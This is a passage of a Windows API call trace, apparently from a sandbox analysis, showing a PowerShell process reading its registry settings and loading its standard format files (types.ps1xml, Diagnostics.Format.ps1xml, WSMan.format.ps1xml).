	[0726.766] ReadFile (in: hFile=0x324, lpBuffer=0x2d65b60, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x18d408, lpOverlapped=0x0 | out: lpBuffer=0x2d65b60*, lpNumberOfBytesRead=0x18d408*=0x1000, lpOverlapped=0x0) returned 1
	[0726.766] ReadFile (in: hFile=0x324, lpBuffer=0x2d65b60, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x18d408, lpOverlapped=0x0 | out: lpBuffer=0x2d65b60*, lpNumberOfBytesRead=0x18d408*=0x1000, lpOverlapped=0x0) returned 1
	[0726.766] ReadFile (in: hFile=0x324, lpBuffer=0x2d65b60, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x18d408, lpOverlapped=0x0 | out: lpBuffer=0x2d65b60*, lpNumberOfBytesRead=0x18d408*=0x1000, lpOverlapped=0x0) returned 1
	[0726.769] ReadFile (in: hFile=0x324, lpBuffer=0x2d65b60, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x18d408, lpOverlapped=0x0 | out: lpBuffer=0x2d65b60*, lpNumberOfBytesRead=0x18d408*=0x1000, lpOverlapped=0x0) returned 1
	[0726.770] ReadFile (in: hFile=0x324, lpBuffer=0x2d65b60, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x18d408, lpOverlapped=0x0 | out: lpBuffer=0x2d65b60*, lpNumberOfBytesRead=0x18d408*=0x1000, lpOverlapped=0x0) returned 1
	[0726.770] ReadFile (in: hFile=0x324, lpBuffer=0x2d65b60, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x18d408, lpOverlapped=0x0 | out: lpBuffer=0x2d65b60*, lpNumberOfBytesRead=0x18d408*=0x1000, lpOverlapped=0x0) returned 1
	[0726.773] ReadFile (in: hFile=0x324, lpBuffer=0x2d65b60, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x18d408, lpOverlapped=0x0 | out: lpBuffer=0x2d65b60*, lpNumberOfBytesRead=0x18d408*=0x1000, lpOverlapped=0x0) returned 1
	[0726.773] ReadFile (in: hFile=0x324, lpBuffer=0x2d65b60, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x18d408, lpOverlapped=0x0 | out: lpBuffer=0x2d65b60*, lpNumberOfBytesRead=0x18d408*=0x1000, lpOverlapped=0x0) returned 1
	[0726.773] ReadFile (in: hFile=0x324, lpBuffer=0x2d65b60, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x18d408, lpOverlapped=0x0 | out: lpBuffer=0x2d65b60*, lpNumberOfBytesRead=0x18d408*=0x1000, lpOverlapped=0x0) returned 1
	[0726.774] ReadFile (in: hFile=0x324, lpBuffer=0x2d65b60, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x18d408, lpOverlapped=0x0 | out: lpBuffer=0x2d65b60*, lpNumberOfBytesRead=0x18d408*=0x1000, lpOverlapped=0x0) returned 1
	[0726.774] ReadFile (in: hFile=0x324, lpBuffer=0x2d65b60, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x18d408, lpOverlapped=0x0 | out: lpBuffer=0x2d65b60*, lpNumberOfBytesRead=0x18d408*=0x1000, lpOverlapped=0x0) returned 1
	[0726.774] ReadFile (in: hFile=0x324, lpBuffer=0x2d65b60, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x18d408, lpOverlapped=0x0 | out: lpBuffer=0x2d65b60*, lpNumberOfBytesRead=0x18d408*=0x1000, lpOverlapped=0x0) returned 1
	[0726.775] ReadFile (in: hFile=0x324, lpBuffer=0x2d65b60, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x18d408, lpOverlapped=0x0 | out: lpBuffer=0x2d65b60*, lpNumberOfBytesRead=0x18d408*=0x1000, lpOverlapped=0x0) returned 1
	[0726.775] ReadFile (in: hFile=0x324, lpBuffer=0x2d65b60, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x18d408, lpOverlapped=0x0 | out: lpBuffer=0x2d65b60*, lpNumberOfBytesRead=0x18d408*=0x1000, lpOverlapped=0x0) returned 1
	[0726.775] ReadFile (in: hFile=0x324, lpBuffer=0x2d65b60, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x18d408, lpOverlapped=0x0 | out: lpBuffer=0x2d65b60*, lpNumberOfBytesRead=0x18d408*=0x1000, lpOverlapped=0x0) returned 1
	[0726.776] ReadFile (in: hFile=0x324, lpBuffer=0x2d65b60, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x18d408, lpOverlapped=0x0 | out: lpBuffer=0x2d65b60*, lpNumberOfBytesRead=0x18d408*=0x1000, lpOverlapped=0x0) returned 1
	[0726.776] ReadFile (in: hFile=0x324, lpBuffer=0x2d65b60, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x18d408, lpOverlapped=0x0 | out: lpBuffer=0x2d65b60*, lpNumberOfBytesRead=0x18d408*=0x1000, lpOverlapped=0x0) returned 1
	[0726.776] ReadFile (in: hFile=0x324, lpBuffer=0x2d65b60, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x18d408, lpOverlapped=0x0 | out: lpBuffer=0x2d65b60*, lpNumberOfBytesRead=0x18d408*=0x1000, lpOverlapped=0x0) returned 1
	[0726.777] ReadFile (in: hFile=0x324, lpBuffer=0x2d65b60, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x18d408, lpOverlapped=0x0 | out: lpBuffer=0x2d65b60*, lpNumberOfBytesRead=0x18d408*=0x1000, lpOverlapped=0x0) returned 1
	[0726.777] ReadFile (in: hFile=0x324, lpBuffer=0x2d65b60, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x18d408, lpOverlapped=0x0 | out: lpBuffer=0x2d65b60*, lpNumberOfBytesRead=0x18d408*=0x1000, lpOverlapped=0x0) returned 1
	[0726.777] ReadFile (in: hFile=0x324, lpBuffer=0x2d65b60, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x18d408, lpOverlapped=0x0 | out: lpBuffer=0x2d65b60*, lpNumberOfBytesRead=0x18d408*=0x1000, lpOverlapped=0x0) returned 1
	[0726.778] ReadFile (in: hFile=0x324, lpBuffer=0x2d65b60, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x18d408, lpOverlapped=0x0 | out: lpBuffer=0x2d65b60*, lpNumberOfBytesRead=0x18d408*=0x1000, lpOverlapped=0x0) returned 1
	[0726.788] ReadFile (in: hFile=0x324, lpBuffer=0x2d65b60, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x18d408, lpOverlapped=0x0 | out: lpBuffer=0x2d65b60*, lpNumberOfBytesRead=0x18d408*=0x1000, lpOverlapped=0x0) returned 1
	[0726.788] ReadFile (in: hFile=0x324, lpBuffer=0x2d65b60, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x18d408, lpOverlapped=0x0 | out: lpBuffer=0x2d65b60*, lpNumberOfBytesRead=0x18d408*=0x1000, lpOverlapped=0x0) returned 1
	[0726.788] ReadFile (in: hFile=0x324, lpBuffer=0x2d65b60, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x18d408, lpOverlapped=0x0 | out: lpBuffer=0x2d65b60*, lpNumberOfBytesRead=0x18d408*=0x1000, lpOverlapped=0x0) returned 1
	[0726.789] ReadFile (in: hFile=0x324, lpBuffer=0x2d65b60, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x18d408, lpOverlapped=0x0 | out: lpBuffer=0x2d65b60*, lpNumberOfBytesRead=0x18d408*=0x1000, lpOverlapped=0x0) returned 1
	[0726.789] ReadFile (in: hFile=0x324, lpBuffer=0x2d65b60, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x18d408, lpOverlapped=0x0 | out: lpBuffer=0x2d65b60*, lpNumberOfBytesRead=0x18d408*=0x1000, lpOverlapped=0x0) returned 1
	[0726.789] ReadFile (in: hFile=0x324, lpBuffer=0x2d65b60, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x18d408, lpOverlapped=0x0 | out: lpBuffer=0x2d65b60*, lpNumberOfBytesRead=0x18d408*=0x1000, lpOverlapped=0x0) returned 1
	[0726.790] ReadFile (in: hFile=0x324, lpBuffer=0x2d65b60, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x18d408, lpOverlapped=0x0 | out: lpBuffer=0x2d65b60*, lpNumberOfBytesRead=0x18d408*=0x1000, lpOverlapped=0x0) returned 1
	[0726.790] ReadFile (in: hFile=0x324, lpBuffer=0x2d65b60, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x18d408, lpOverlapped=0x0 | out: lpBuffer=0x2d65b60*, lpNumberOfBytesRead=0x18d408*=0x1000, lpOverlapped=0x0) returned 1
	[0726.790] ReadFile (in: hFile=0x324, lpBuffer=0x2d65b60, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x18d408, lpOverlapped=0x0 | out: lpBuffer=0x2d65b60*, lpNumberOfBytesRead=0x18d408*=0x1b4, lpOverlapped=0x0) returned 1
	[0726.790] ReadFile (in: hFile=0x324, lpBuffer=0x2d65b60, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x18d408, lpOverlapped=0x0 | out: lpBuffer=0x2d65b60*, lpNumberOfBytesRead=0x18d408*=0x0, lpOverlapped=0x0) returned 1
	[0726.791] RegOpenKeyExW (in: hKey=0xffffffff80000002, lpSubKey="Software\\Microsoft\\PowerShell\\1\\PowerShellEngine", ulOptions=0x0, samDesired=0x20019, phkResult=0x18d468 | out: phkResult=0x18d468*=0x324) returned 0x0
	[0726.791] RegQueryValueExW (in: hKey=0x324, lpValueName="ApplicationBase", lpReserved=0x0, lpType=0x18d3ec, lpData=0x0, lpcbData=0x18d3e8*=0x0 | out: lpType=0x18d3ec*=0x1, lpData=0x0, lpcbData=0x18d3e8*=0x56) returned 0x0
	[0726.791] CoTaskMemAlloc (cb=0x5a) returned 0x1b941a70
	[0726.791] RegQueryValueExW (in: hKey=0x324, lpValueName="ApplicationBase", lpReserved=0x0, lpType=0x18d3bc, lpData=0x1b941a70, lpcbData=0x18d3b8*=0x56 | out: lpType=0x18d3bc*=0x1, lpData="C:\\Windows\\System32\\WindowsPowerShell\\v1.0", lpcbData=0x18d3b8*=0x56) returned 0x0
	[0728.429] CoTaskMemFree (pv=0x1b941a70) 
	[0728.430] RegCloseKey (hKey=0x324) returned 0x0
	[0728.430] GetFullPathNameW (in: lpFileName="C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\types.ps1xml", nBufferLength=0x105, lpBuffer=0x18d0b0, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\types.ps1xml", lpFilePart=0x0) returned 0x37
	[0728.430] GetFullPathNameW (in: lpFileName="C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\types.ps1xml", nBufferLength=0x105, lpBuffer=0x18cf60, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\types.ps1xml", lpFilePart=0x0) returned 0x37
	[0736.542] VirtualQuery (in: lpAddress=0x18c150, lpBuffer=0x18d010, dwLength=0x30 | out: lpBuffer=0x18d010*(BaseAddress=0x18c000, AllocationBase=0x110000, AllocationProtect=0x4, __alignment1=0x0, RegionSize=0x4000, State=0x1000, Protect=0x4, Type=0x20000, __alignment2=0x0)) returned 0x30
	[0741.160] CoTaskMemAlloc (cb=0x104) returned 0x1b93b8b0
	[0741.160] GetEnvironmentVariableW (in: lpName="MshEnableTrace", lpBuffer=0x1b93b8b0, nSize=0x80 | out: lpBuffer="") returned 0x0
	[0741.160] CoTaskMemFree (pv=0x1b93b8b0) 
	[0741.173] RegOpenKeyExW (in: hKey=0xffffffff80000002, lpSubKey="SOFTWARE\\Microsoft\\PowerShell\\1\\ShellIds\\Microsoft.PowerShell", ulOptions=0x0, samDesired=0x20019, phkResult=0x18d608 | out: phkResult=0x18d608*=0x30c) returned 0x0
	[0741.173] RegQueryValueExW (in: hKey=0x30c, lpValueName="path", lpReserved=0x0, lpType=0x18d61c, lpData=0x0, lpcbData=0x18d618*=0x0 | out: lpType=0x18d61c*=0x1, lpData=0x0, lpcbData=0x18d618*=0x74) returned 0x0
	[0741.174] RegQueryValueExW (in: hKey=0x30c, lpValueName="path", lpReserved=0x0, lpType=0x18d58c, lpData=0x0, lpcbData=0x18d588*=0x0 | out: lpType=0x18d58c*=0x1, lpData=0x0, lpcbData=0x18d588*=0x74) returned 0x0
	[0741.174] CoTaskMemAlloc (cb=0x78) returned 0x244190
	[0741.174] RegQueryValueExW (in: hKey=0x30c, lpValueName="path", lpReserved=0x0, lpType=0x18d55c, lpData=0x244190, lpcbData=0x18d558*=0x74 | out: lpType=0x18d55c*=0x1, lpData="C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\powershell.exe", lpcbData=0x18d558*=0x74) returned 0x0
	[0741.174] CoTaskMemFree (pv=0x244190) 
	[0741.174] GetFullPathNameW (in: lpFileName="C:\\Windows\\System32\\WindowsPowerShell\\v1.0", nBufferLength=0x105, lpBuffer=0x18d2d0, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\System32\\WindowsPowerShell\\v1.0", lpFilePart=0x0) returned 0x2a
	[0741.174] SetErrorMode (uMode=0x1) returned 0x1
	[0741.174] GetFileAttributesExW (in: lpFileName="C:\\Windows\\System32\\WindowsPowerShell\\v1.0" (normalized: "c:\\windows\\system32\\windowspowershell\\v1.0"), fInfoLevelId=0x0, lpFileInformation=0x18d4e0 | out: lpFileInformation=0x18d4e0*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0x80093051, ftCreationTime.dwHighDateTime=0x1ca0444, ftLastAccessTime.dwLowDateTime=0x1dba44b2, ftLastAccessTime.dwHighDateTime=0x1cbf8ea, ftLastWriteTime.dwLowDateTime=0x1dba44b2, ftLastWriteTime.dwHighDateTime=0x1cbf8ea, nFileSizeHigh=0x0, nFileSizeLow=0x1000)) returned 1
	[0741.174] SetErrorMode (uMode=0x1) returned 0x1
	[0741.176] CoTaskMemAlloc (cb=0x104) returned 0x1b93b8b0
	[0741.176] GetEnvironmentVariableW (in: lpName="MshEnableTrace", lpBuffer=0x1b93b8b0, nSize=0x80 | out: lpBuffer="") returned 0x0
	[0741.176] CoTaskMemFree (pv=0x1b93b8b0) 
	[0741.178] CoTaskMemAlloc (cb=0x104) returned 0x1b93b8b0
	[0741.178] GetEnvironmentVariableW (in: lpName="MshEnableTrace", lpBuffer=0x1b93b8b0, nSize=0x80 | out: lpBuffer="") returned 0x0
	[0741.178] CoTaskMemFree (pv=0x1b93b8b0) 
	[0741.178] CoTaskMemAlloc (cb=0x104) returned 0x1b93b8b0
	[0741.178] GetEnvironmentVariableW (in: lpName="MshEnableTrace", lpBuffer=0x1b93b8b0, nSize=0x80 | out: lpBuffer="") returned 0x0
	[0741.178] CoTaskMemFree (pv=0x1b93b8b0) 
	[0741.179] CoTaskMemAlloc (cb=0x104) returned 0x1b93b8b0
	[0741.179] GetEnvironmentVariableW (in: lpName="MshEnableTrace", lpBuffer=0x1b93b8b0, nSize=0x80 | out: lpBuffer="") returned 0x0
	[0741.179] CoTaskMemFree (pv=0x1b93b8b0) 
	[0741.179] CreateFileW (lpFileName="C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\Diagnostics.Format.ps1xml" (normalized: "c:\\windows\\system32\\windowspowershell\\v1.0\\diagnostics.format.ps1xml"), dwDesiredAccess=0x80000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x8100000, hTemplateFile=0x0) returned 0x324
	[0741.180] GetFileType (hFile=0x324) returned 0x1
	[0741.180] SetErrorMode (uMode=0x1) returned 0x1
	[0741.180] GetFileType (hFile=0x324) returned 0x1
	[0741.180] ReadFile (in: hFile=0x324, lpBuffer=0x340d728, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x18d178, lpOverlapped=0x0 | out: lpBuffer=0x340d728*, lpNumberOfBytesRead=0x18d178*=0x1000, lpOverlapped=0x0) returned 1
	[0741.182] ReadFile (in: hFile=0x324, lpBuffer=0x340d728, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x18d178, lpOverlapped=0x0 | out: lpBuffer=0x340d728*, lpNumberOfBytesRead=0x18d178*=0x1000, lpOverlapped=0x0) returned 1
	[0741.182] ReadFile (in: hFile=0x324, lpBuffer=0x340d728, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x18d178, lpOverlapped=0x0 | out: lpBuffer=0x340d728*, lpNumberOfBytesRead=0x18d178*=0x1000, lpOverlapped=0x0) returned 1
	[0741.182] ReadFile (in: hFile=0x324, lpBuffer=0x340d728, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x18d178, lpOverlapped=0x0 | out: lpBuffer=0x340d728*, lpNumberOfBytesRead=0x18d178*=0x1000, lpOverlapped=0x0) returned 1
	[0741.183] ReadFile (in: hFile=0x324, lpBuffer=0x340d728, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x18d178, lpOverlapped=0x0 | out: lpBuffer=0x340d728*, lpNumberOfBytesRead=0x18d178*=0x1000, lpOverlapped=0x0) returned 1
	[0741.183] ReadFile (in: hFile=0x324, lpBuffer=0x340d728, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x18d178, lpOverlapped=0x0 | out: lpBuffer=0x340d728*, lpNumberOfBytesRead=0x18d178*=0x1000, lpOverlapped=0x0) returned 1
	[0741.184] ReadFile (in: hFile=0x324, lpBuffer=0x340d728, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x18d178, lpOverlapped=0x0 | out: lpBuffer=0x340d728*, lpNumberOfBytesRead=0x18d178*=0x9e2, lpOverlapped=0x0) returned 1
	[0741.184] ReadFile (in: hFile=0x324, lpBuffer=0x340cc72, nNumberOfBytesToRead=0x21e, lpNumberOfBytesRead=0x18d178, lpOverlapped=0x0 | out: lpBuffer=0x340cc72*, lpNumberOfBytesRead=0x18d178*=0x0, lpOverlapped=0x0) returned 1
	[0741.184] ReadFile (in: hFile=0x324, lpBuffer=0x340d728, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x18d178, lpOverlapped=0x0 | out: lpBuffer=0x340d728*, lpNumberOfBytesRead=0x18d178*=0x0, lpOverlapped=0x0) returned 1
	[0741.184] CloseHandle (hObject=0x324) returned 1
	[0741.184] GetFullPathNameW (in: lpFileName="C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\Diagnostics.Format.ps1xml", nBufferLength=0x105, lpBuffer=0x18cec0, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\Diagnostics.Format.ps1xml", lpFilePart=0x0) returned 0x44
	[0741.184] SetErrorMode (uMode=0x1) returned 0x1
	[0741.184] GetFileAttributesExW (in: lpFileName="C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\Diagnostics.Format.ps1xml" (normalized: "c:\\windows\\system32\\windowspowershell\\v1.0\\diagnostics.format.ps1xml"), fInfoLevelId=0x0, lpFileInformation=0x18d120 | out: lpFileInformation=0x18d120*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x67d93418, ftCreationTime.dwHighDateTime=0x1ca03f8, ftLastAccessTime.dwLowDateTime=0x67d93418, ftLastAccessTime.dwHighDateTime=0x1ca03f8, ftLastWriteTime.dwLowDateTime=0xe5e03e37, ftLastWriteTime.dwHighDateTime=0x1c9ea0b, nFileSizeHigh=0x0, nFileSizeLow=0x69e2)) returned 1
	[0741.184] SetErrorMode (uMode=0x1) returned 0x1
	[0741.185] GetFullPathNameW (in: lpFileName="C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\Diagnostics.Format.ps1xml", nBufferLength=0x105, lpBuffer=0x18ce50, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\Diagnostics.Format.ps1xml", lpFilePart=0x0) returned 0x44
	[0741.185] RegOpenKeyExW (in: hKey=0xffffffff80000002, lpSubKey="Software\\Microsoft\\PowerShell\\1\\PowerShellEngine", ulOptions=0x0, samDesired=0x20019, phkResult=0x18d208 | out: phkResult=0x18d208*=0x324) returned 0x0
	[0741.185] RegQueryValueExW (in: hKey=0x324, lpValueName="ApplicationBase", lpReserved=0x0, lpType=0x18d18c, lpData=0x0, lpcbData=0x18d188*=0x0 | out: lpType=0x18d18c*=0x1, lpData=0x0, lpcbData=0x18d188*=0x56) returned 0x0
	[0741.185] CoTaskMemAlloc (cb=0x5a) returned 0x1b941a00
	[0741.185] RegQueryValueExW (in: hKey=0x324, lpValueName="ApplicationBase", lpReserved=0x0, lpType=0x18d15c, lpData=0x1b941a00, lpcbData=0x18d158*=0x56 | out: lpType=0x18d15c*=0x1, lpData="C:\\Windows\\System32\\WindowsPowerShell\\v1.0", lpcbData=0x18d158*=0x56) returned 0x0
	[0741.185] CoTaskMemFree (pv=0x1b941a00) 
	[0741.185] RegCloseKey (hKey=0x324) returned 0x0
	[0741.185] GetFullPathNameW (in: lpFileName="C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\Diagnostics.Format.ps1xml", nBufferLength=0x105, lpBuffer=0x18ce50, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\Diagnostics.Format.ps1xml", lpFilePart=0x0) returned 0x44
	[0741.186] GetFullPathNameW (in: lpFileName="C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\Diagnostics.Format.ps1xml", nBufferLength=0x105, lpBuffer=0x18cd00, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\Diagnostics.Format.ps1xml", lpFilePart=0x0) returned 0x44
	[0741.190] CoCreateGuid (in: pguid=0x18d430 | out: pguid=0x18d430*(Data1=0x8b6f3da1, Data2=0xa961, Data3=0x404f, Data4=([0]=0xb9, [1]=0x91, [2]=0x30, [3]=0xef, [4]=0x15, [5]=0x5e, [6]=0xdd, [7]=0x7e))) returned 0x0
	[0742.527] CoCreateGuid (in: pguid=0x18d430 | out: pguid=0x18d430*(Data1=0x11f478ef, Data2=0x6597, Data3=0x4892, Data4=([0]=0xa0, [1]=0xc8, [2]=0x62, [3]=0x1c, [4]=0xae, [5]=0xd4, [6]=0xa7, [7]=0x72))) returned 0x0
	[0742.530] GetFullPathNameW (in: lpFileName="C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\WSMan.format.ps1xml", nBufferLength=0x105, lpBuffer=0x18cbf0, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\WSMan.format.ps1xml", lpFilePart=0x0) returned 0x3e
	[0742.530] SetErrorMode (uMode=0x1) returned 0x1
	[0742.531] CreateFileW (lpFileName="C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\WSMan.format.ps1xml" (normalized: "c:\\windows\\system32\\windowspowershell\\v1.0\\wsman.format.ps1xml"), dwDesiredAccess=0x80000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x8100000, hTemplateFile=0x0) returned 0x324
	[0742.531] GetFileType (hFile=0x324) returned 0x1
	[0742.531] SetErrorMode (uMode=0x1) returned 0x1
	[0742.531] GetFileType (hFile=0x324) returned 0x1
	[0742.531] ReadFile (in: hFile=0x324, lpBuffer=0x3438290, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x18d178, lpOverlapped=0x0 | out: lpBuffer=0x3438290*, lpNumberOfBytesRead=0x18d178*=0x1000, lpOverlapped=0x0) returned 1
	[0742.533] ReadFile (in: hFile=0x324, lpBuffer=0x3438290, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x18d178, lpOverlapped=0x0 | out: lpBuffer=0x3438290*, lpNumberOfBytesRead=0x18d178*=0x1000, lpOverlapped=0x0) returned 1
	[0742.533] ReadFile (in: hFile=0x324, lpBuffer=0x3438290, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x18d178, lpOverlapped=0x0 | out: lpBuffer=0x3438290*, lpNumberOfBytesRead=0x18d178*=0x1000, lpOverlapped=0x0) returned 1
	[0742.534] ReadFile (in: hFile=0x324, lpBuffer=0x3438290, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x18d178, lpOverlapped=0x0 | out: lpBuffer=0x3438290*, lpNumberOfBytesRead=0x18d178*=0x1000, lpOverlapped=0x0) returned 1
	[0742.534] ReadFile (in: hFile=0x324, lpBuffer=0x3438290, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x18d178, lpOverlapped=0x0 | out: lpBuffer=0x3438290*, lpNumberOfBytesRead=0x18d178*=0x1000, lpOverlapped=0x0) returned 1
	[0742.536] ReadFile (in: hFile=0x324, lpBuffer=0x3438290, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x18d178, lpOverlapped=0x0 | out: lpBuffer=0x3438290*, lpNumberOfBytesRead=0x18d178*=0xfb2, lpOverlapped=0x0) returned 1
	[0742.536] ReadFile (in: hFile=0x324, lpBuffer=0x34379aa, nNumberOfBytesToRead=0x4e, lpNumberOfBytesRead=0x18d178, lpOverlapped=0x0 | out: lpBuffer=0x34379aa*, lpNumberOfBytesRead=0x18d178*=0x0, lpOverlapped=0x0) returned 1
	[0742.536] ReadFile (in: hFile=0x324, lpBuffer=0x3438290, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x18d178, lpOverlapped=0x0 | out: lpBuffer=0x3438290*, lpNumberOfBytesRead=0x18d178*=0x0, lpOverlapped=0x0) returned 1
	[0742.536] CloseHandle (hObject=0x324) returned 1
	[0742.536] GetFullPathNameW (in: lpFileName="C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\WSMan.format.ps1xml", nBufferLength=0x105, lpBuffer=0x18cec0, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\WSMan.format.ps1xml", lpFilePart=0x0) returned 0x3e
	[0742.536] SetErrorMode (uMode=0x1) returned 0x1
	[0742.537] GetFileAttributesExW (in: lpFileName="C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\WSMan.format.ps1xml" (normalized: "c:\\windows\\system32\\windowspowershell\\v1.0\\wsman.format.ps1xml"), fInfoLevelId=0x0, lpFileInformation=0x18d120 | out: lpFileInformation=0x18d120*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x67f36317, ftCreationTime.dwHighDateTime=0x1ca03f8, ftLastAccessTime.dwLowDateTime=0x67f36317, ftLastAccessTime.dwHighDateTime=0x1ca03f8, ftLastWriteTime.dwLowDateTime=0xe6065417, ftLastWriteTime.dwHighDateTime=0x1c9ea0b, nFileSizeHigh=0x0, nFileSizeLow=0x5fb2)) returned 1
	[0742.537] SetErrorMode (uMode=0x1) returned 0x1
	[0742.537] GetFullPathNameW (in: lpFileName="C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\WSMan.format.ps1xml", nBufferLength=0x105, lpBuffer=0x18ce50, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\WSMan.format.ps1xml", lpFilePart=0x0) returned 0x3e
	[0742.537] RegOpenKeyExW (in: hKey=0xffffffff80000002, lpSubKey="Software\\Microsoft\\PowerShell\\1\\PowerShellEngine", ulOptions=0x0, samDesired=0x20019, phkResult=0x18d208 | out: phkResult=0x18d208*=0x324) returned 0x0
	[0742.537] RegQueryValueExW (in: hKey=0x324, lpValueName="ApplicationBase", lpReserved=0x0, lpType=0x18d18c, lpData=0x0, lpcbData=0x18d188*=0x0 | out: lpType=0x18d18c*=0x1, lpData=0x0, lpcbData=0x18d188*=0x56) returned 0x0
	[0742.537] CoTaskMemAlloc (cb=0x5a) returned 0x1b941920
	[0742.537] RegQueryValueExW (in: hKey=0x324, lpValueName="ApplicationBase", lpReserved=0x0, lpType=0x18d15c, lpData=0x1b941920, lpcbData=0x18d158*=0x56 | out: lpType=0x18d15c*=0x1, lpData="C:\\Windows\\System32\\WindowsPowerShell\\v1.0", lpcbData=0x18d158*=0x56) returned 0x0
	[0742.537] CoTaskMemFree (pv=0x1b941920) 
	[0742.537] RegCloseKey (hKey=0x324) returned 0x0
	[0742.537] GetFullPathNameW (in: lpFileName="C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\WSMan.format.ps1xml", nBufferLength=0x105, lpBuffer=0x18ce50, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\WSMan.format.ps1xml", lpFilePart=0x0) returned 0x3e
	[0742.538] GetFullPathNameW (in: lpFileName="C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\WSMan.format.ps1xml", nBufferLength=0x105, lpBuffer=0x18cd00, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\WSMan.format.ps1xml", lpFilePart=0x0) returned 0x3e
	[0742.541] CoCreateGuid (in: pguid=0x18d430 | out: pguid=0x18d430*(Data1=0x88b98ad2, Data2=0x83e1, Data3=0x4478, Data4=([0]=0x96, [1]=0x8e, [2]=0x25, [3]=0x80, [4]=0x49, [5]=0x77, [6]=0x90, [7]=0x3c))) returned 0x0
	[0742.545] CoCreateGuid (in: pguid=0x18d430 | out: pguid=0x18d430*(Data1=0xddc02d1, Data2=0x97f1, Data3=0x49c8, Data4=([0]=0x88, [1]=0xb0, [2]=0x3f, [3]=0xc6, [4]=0xd4, [5]=0xd8, [6]=0x17, [7]=0x49))) returned 0x0
